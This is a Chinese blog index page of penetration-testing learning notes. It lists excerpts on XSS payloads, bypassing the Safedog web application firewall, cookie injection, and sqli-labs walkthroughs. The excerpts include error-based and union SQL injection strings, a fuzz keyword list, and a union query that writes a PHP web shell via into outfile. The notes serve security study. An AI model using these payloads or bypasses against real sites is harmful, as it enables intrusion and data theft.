会员
周边
新闻
博问
AI培训
云市场
所有博客
当前博客
我的博客
我的园子
账号设置
简洁模式
...
退出登录
注册
登录
sjzdest
博客园
|
首页
|
新随笔
|
新文章
|
联系
|
订阅
|
管理
2022年12月28日
xss注入小节
摘要: error事件<img src="" onerror=alert(1)><script>alert(1)</script>() = ``\u003c \u003e固定网址 加数字 onerror=alert(1)没有匹配换行符, 可以通过换行来绕过匹配表单无法逃避type="image" src="
阅读全文
posted @ 2022-12-28 12:39 简单的小白渗透
阅读(19)
评论(0)
推荐(0)
编辑
安全狗绕过
摘要: 安全狗绕过的五种方法 (一)内联注释(/*![12345]*/)绕过方法: /*!select*/: 相当于没有注释 /*!12345select*/: 当12345小于当前mysql版本号的时候,注释不生效,当大于版本号的时候注释生效。 /*![]*/: []中括号中的数字若填写则必须是5位 (二
阅读全文
posted @ 2022-12-28 12:37 简单的小白渗透
阅读(568)
评论(0)
推荐(0)
编辑
Cookie注入新方法
摘要: 判断一个网站是否支持cookie注入_> 现在是get ,你可以把参数放在post里面试试看看是否返回正常 用hackbar插件也行或者用burp suite改包也行 如果返回正常,说明支持cookie 接着把id=24放在cookie后面,并且用分号分隔开 也是返回正常 也可以在sqlmap里面跑
阅读全文
posted @ 2022-12-28 10:57 简单的小白渗透
阅读(76)
评论(0)
推荐(0)
编辑
2022年12月12日
sql-lib8-28
摘要: 8-22'or updatexml(1,concat(0x7e,(select database()),0x7e),1) or''or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.t
阅读全文
posted @ 2022-12-12 13:34 简单的小白渗透
阅读(29)
评论(0)
推荐(0)
编辑
sql注入总汇
摘要: 网址?id=10'union select 1,database(),3 -- qweupdatexml(1,concat(0x7e,(SELECT database()),0x7e),1)union select 1,"<?php eval($_REQUEST[8])?>",3 into outf
阅读全文
posted @ 2022-12-12 13:33 简单的小白渗透
阅读(29)
评论(0)
推荐(0)
编辑
sql注入fuzz字典
摘要: length Length+handlerlikeLiKeselectSeleCT sleepSLEEpdatabaseDATABASedeletehavingoroRasAs-~BENCHMARKlimitLimItleftLeftselectSELECTinsertinsERTINSERTrig
阅读全文
posted @ 2022-12-12 13:32 简单的小白渗透
阅读(561)
评论(0)
推荐(0)
编辑
2022年12月3日
sql-lab 8-17 盲注加post传参
摘要: 布尔型盲注length() 函数 返回字符串的长度?id=1' and (length(database()))=8 -- qwesubstr() 截取字符串 (语法:SUBSTR(str,pos,len);) ?id=1' and (ascii(substr(database(),1,1)))=1
阅读全文
posted @ 2022-12-03 19:22 简单的小白渗透
阅读(35)
评论(0)
推荐(0)
编辑
2022年11月30日
sql-lab 1-7
摘要: 判断是否存在注入:?id=1' and 1=1 -- qwe 判断字段数:?id=1'order by 3-- qwe 判断显错位 :?id=10'union select 1,2,3 -- qwe 判断库名:?id=10'union select 1,database(),3 -- limit0,
阅读全文
posted @ 2022-11-30 20:08 简单的小白渗透
阅读(41)
评论(0)
推荐(0)
编辑
公告